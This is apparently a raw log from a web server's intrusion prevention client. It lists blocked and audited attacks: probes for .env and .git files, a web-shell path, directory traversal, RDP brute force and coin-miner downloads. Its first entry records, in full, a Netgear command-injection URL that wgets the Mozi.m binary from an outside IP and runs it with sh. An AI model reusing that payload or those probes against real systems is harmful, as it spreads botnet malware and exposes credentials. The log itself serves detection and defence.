00000000	00000000	
0000044f	01dc941cf215623a	000000ce	00000003	164a8367	52c46367	00000002	00000001	00000001	01dc941ccb758662	01dc941ccb758662	00000001	00000128	[SID: 30205] Web Attack: Netgear Router Authentication Bypass attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNBRjE3OTRELTk0MUMtMTFGMS05NkVBLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzAyMDUsIm5hbWUiOiJXZWIgQXR0YWNrOiBOZXRnZWFyIFJvdXRlciBBdXRoZW50aWNhdGlvbiBCeXBhc3MiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000075fd	00010000	00000002	00000002	0000fdfb	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Netgear Router Authentication Bypass	http:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.99.196.82:39698/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003aa	01dc941d77ac1bbf	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc941d53c9fad5	01dc941d53c9fad5	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjUzQzc3ODE0LTk0MUQtMTFGMS05MDRFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000f2e9	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://nguyendolawyers.com.au/wp-content/themes/seotheme/db.php?u			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000387	01dc941d7b1276ff	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc941d547f5390	01dc941d547f5390	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjUzQzc4NEQzLTk0MUQtMTFGMS05MDRFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000f2bc	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://nguyendolawyers.com.au/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a5	01dc941d7b1276ff	000000ce	0000000f	164a8367	f5629a2d	00000002	00000002	00000001	01dc941d5483f54b	01dc941d5483f54b	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjUzQzkwRUM1LTk0MUQtMTFGMS05MDRGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000f2b9	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://nguyendolawyers.com.au/ALFA_DATA/alfacgiapi/perl.alfa			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc941d95ba5a95	000000ce	0000000f	164a8367	07e84750	00000002	00000002	00000001	01dc941d6ed572fe	01dc941d6ed572fe	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZFRDU1RjJELTk0MUQtMTFGMS04REE3LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000ee0c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://shopapplevn.com/v2/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000baf	01dc941e0a2f3f4f	000000ce	0000000f	164a8367	2036bfa0	00000002	00000002	00000001	01dc941de4bc03f6	01dc941de4bc03f6	00000001	00000910	[SID: 32856] Audit: RDP Bruteforce Attempt 2 attack detected but not blocked. Application path: C:\PROGRAM FILES\MARIADB 10.5\BIN\MYSQLD.EXE		C:\PROGRAM FILES\MARIADB 10.5\BIN\MYSQLD.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXNcXE1hcmlhREIgMTAuNVxcYmluXFxteXNxbGQuZXhlXCIgXCItLWRlZmF1bHRzLWZpbGU9QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxEYXRhYmFzZXNcXE15U1FMXFxteS5pbmlcIiBNYXJpYURCMTA1IiwiZmlsZSI6eyJjcmVhdGVkIjoxNzQ1NTg0OTE0MDAwLCJmb2xkZXIiOiJjOlxccHJvZ3JhbSBmaWxlc1xcbWFyaWFkYiAxMC41XFxiaW5cXCIsIm1kNSI6IkQzQzlDN0U1RjY5NzlERjlGODczNjI2MzUzNDMwMEM0IiwibmFtZSI6Im15c3FsZC5leGUiLCJwYXRoIjoiYzpcXHByb2dyYW0gZmlsZXNcXG1hcmlhZGIgMTAuNVxcYmluXFxteXNxbGQuZXhlIiwic2hhMSI6IjIxRjYxMDVFQTMzNTZEQ0YyRkE1MjIyMUE0NkVDQ0I3ODYxNTE4ODEiLCJzaGEyIjoiMjZBMUNDMUQxRURCNzAwMzc1ODBCNUNDODVFQzFDRjU0MDBEREM1REQ3QTFFQTU2NEIyMEI4NzlFMjVEMTg4NiIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiMTAuNS4yOS4wIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ1MDAsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwMTk3NDk2OTQsInVpZCI6IjY1RjJGQjI1LTAwMEUtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkU0QjhCNjMxLTk0MUQtMTFGMS05RjFBLTgwNkU2RjZFNjk2MyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxzeXN0ZW0zMlxcc2VydmljZXMuZXhlIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNzQ0MTY0NzU2Nzg3LCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzdGVtMzJcXCIsIm1kNSI6IjgwN0I0NjgzRTM3OUY3MUI1OTVEMDY1RDFGOUMxREM4IiwibmFtZSI6InNlcnZpY2VzLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzdGVtMzJcXHNlcnZpY2VzLmV4ZSIsInByb2R1Y3RfbmFtZSI6Ik1pY3Jvc29mdMKuIFdpbmRvd3PCriBPcGVyYXRpbmcgU3lzdGVtIiwic2hhMSI6IjdGOTk1MUNBMkZBRDNFRTc1RjM5MDRBMDc4NzE0ODBBNzVGMDNBRDYiLCJzaGEyIjoiNjE0ODA3NTIxMjdDNDdFQTcxQTYxMjE3REQyRDQ2RkRBMTA0QjBCNDhBRjk5MDVERUQ2QzYwN0I5NDZEQTNEMSIsInNpZ25hdHVyZV9jb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJzaWduYXR1cmVfY3JlYXRlZF9kYXRlIjoxNzQzNTczODQwMDAwLCJzaWduYXR1cmVfaXNzdWVyIjoiTWljcm9zb2Z0IFdpbmRvd3MgUHJvZHVjdGlvbiBQQ0EgMjAxMSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUyMDc3MDEwMywic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzEsMiwzLDUsNiwxNiwxNywxOCwyMF0sInZlcnNpb24iOiIxMC4wLjIwMzQ4LjM0NTEiLCJ4YXR0cmlidXRlcyI6eyJwb3J0YWwiOmZhbHNlfX0sInBpZCI6MTEwNCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAxOTczNzEyNSwidWlkIjoiNjVGMkY5RDItMDAwRS1GMUYxLUI5RUMtNjBBQkM1RUYxREQ0In0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzI4NTYsIm5hbWUiOiJBdWRpdDogUkRQIEJydXRlZm9yY2UgQXR0ZW1wdCAyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00008058	00010000	00000002	00000002	0000d61c	00000cea	00000000000000000000000000000000	00000000000000000000000000000000	Audit: RDP Bruteforce Attempt 2				14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		26A1CC1D1EDB70037580B5CC85EC1CF5400DDC5DD7A1EA564B20B879E25D1886	00000000	00000000	
00000215	01dc941e56b214ab	000000d3	0000000f	164a8367	52c46367	00000001	00000000	00000000	01dc941e319d3968	01dc941e319d3968	00000001	00000000	Active Response that started at 2/2/2026 3:20:31 PM is disengaged. The traffic from IP address 103.99.196.82 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b0	01dc9420bb71df1c	000000ce	0000000f	164a8367	926a1bcb	00000002	00000002	00000001	01dc9420959b7c09	01dc942097012307	00000003	00000118	[SID: 34488] Audit: Generic Directory Traversal 10 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijk3MDEwMjZBLTk0MjAtMTFGMS1CQjBDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzQ0ODgsIm5hbWUiOiJBdWRpdDogR2VuZXJpYyBEaXJlY3RvcnkgVHJhdmVyc2FsIDEwIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000086b8	00010000	00000002	00000002	0000a8fe	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Generic Directory Traversal 10	http://phuongbacjsc.com.vn/../vi/san-pham-nhom.aspx?idn=0			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039f	01dc942204f2765a	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc9421e0386436	01dc9421e0386436	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkUwMzg1Mzk1LTk0MjEtMTFGMS1CNTIxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00006e88	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://toanvietjsc.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a4	01dc9422d9dc416d	000000ce	0000000f	164a8367	f70a942d	00000002	00000002	00000001	01dc9422b518f7a3	01dc9422b518f7a3	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkI1MTZFMjQ4LTk0MjItMTFGMS05QzZBLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00008e42	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://vinfast-cantho3s.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc94235b8c710b	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc9423595763cd	01dc9424bef81fcd	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 4:07:25 PM to 2/2/2026 4:17:25 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc94237cd0ca79	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9423589fcd53	01dc9423589fcd53	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjgyNDQsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwMjI5MzM5NzQsInVpZCI6IjY1RjMwNzVCLTAwMEUtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoyfSwiZGV0ZWN0aW9uX3VpZCI6IjU4OUNDQUY3LTk0MjMtMTFGMS05MEZGLTgwNkU2RjZFNjk2MyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxTeXNXT1c2NFxcaW5ldHNydlxcdzN3cC5leGUgLWFwIFwic3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcIiAtdiBcInYyLjBcIiAtbCBcIndlYmVuZ2luZTQuZGxsXCIgLWEgXFxcXC5cXHBpcGVcXGlpc2lwbTVhZDhjNGUzLTczY2UtNDM0MS1iYWMyLWM3YWU0MzFkNzk2NCAtaCBcIkM6XFxpbmV0cHViXFx0ZW1wXFxhcHBwb29sc1xcc3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpLmNvbmZpZ1wiIC13IFwiXCIgLW0gMCAtdCA1IC10YSAwIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNjIwNDYxNzYyMTkxLCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXCIsIm1kNSI6IjNEMjcyNTc0RjM3OEJBMDZGRDJCODVDQjc3OUMwM0FBIiwibmFtZSI6Inczd3AuZXhlIiwicGF0aCI6ImM6XFx3aW5kb3dzXFxzeXN3b3c2NFxcaW5ldHNydlxcdzN3cC5leGUiLCJwcm9kdWN0X25hbWUiOiJJbnRlcm5ldCBJbmZvcm1hdGlvbiBTZXJ2aWNlcyIsInNoYTEiOiIxOTE3RjY5RUQyNjBFNTEzMTAxNUY5QTVENzIxMUFGNzBGMEVBNTNCIiwic2hhMiI6IkE0RTFBNUIxNDg5QjMxNjA2NEYwODNDNENEN0JGQzgzQjcwRUU0Njg0QTREOTdEMUFEMUM0RTZENjQ4MTYxQTMiLCJzaWduYXR1cmVfY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwic2lnbmF0dXJlX2NyZWF0ZWRfZGF0ZSI6MTc0ODM1ODU0MDAwMCwic2lnbmF0dXJlX2lzc3VlciI6Ik1pY3Jvc29mdCBXaW5kb3dzIFByb2R1Y3Rpb24gUENBIDIwMTEiLCJzaWduYXR1cmVfdmFsdWUiOjEwOTk1MjA3NzQxOTksInNpZ25hdHVyZV92YWx1ZV9pZHMiOlsxLDIsMyw1LDYsMTMsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4yMDM0OC4xIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjM5OTMyLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDIyOTMzMjYxLCJ1aWQiOiI2NUYzMDc1OC0wMDBFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwicmVtZWRpYXRlZCI6dHJ1ZSwidGhyZWF0Ijp7ImlkIjozMTkwOCwibmFtZSI6IldlYiBBdHRhY2s6IEpTQ29pbm1pbmVyIERvd25sb2FkIDEwOCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000c083	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770023240.6464390754699707031250			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000215	01dc9424e480a28d	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc9424befc30f2	01dc9424befc30f2	00000001	00000000	Active Response that started at 2/2/2026 4:07:25 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000211	01dc942995742f43	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc942994c87fe7	01dc942afa693be7	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 4:52:02 PM to 2/2/2026 5:02:02 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc9429ba0bf713	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc942994a259d8	01dc942994a259d8	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjM1NzY0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDI1NTQ0NjE4LCJ1aWQiOiI2NUYzMEQ1Mi0wMDBFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI5NDlGMjc0NS05NDI5LTExRjEtQkU2Ni04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG1kNzZkNTliNC03MzgyLTQ3NjItYjdmOS05MDEzZGM0MDgyMTQgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoyNzk3Miwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAyNDc1ODUyNiwidWlkIjoiNjVGMzBCOTgtMDAwRS1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000cdfd	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770025918.6993720531463623046875			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003b6	01dc942a13e7064b	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc9429ed363a36	01dc9429ed363a36	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkVEMzMxMkU2LTk0MjktMTFGMS05NThELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00008967	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ruoubinhdinh.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
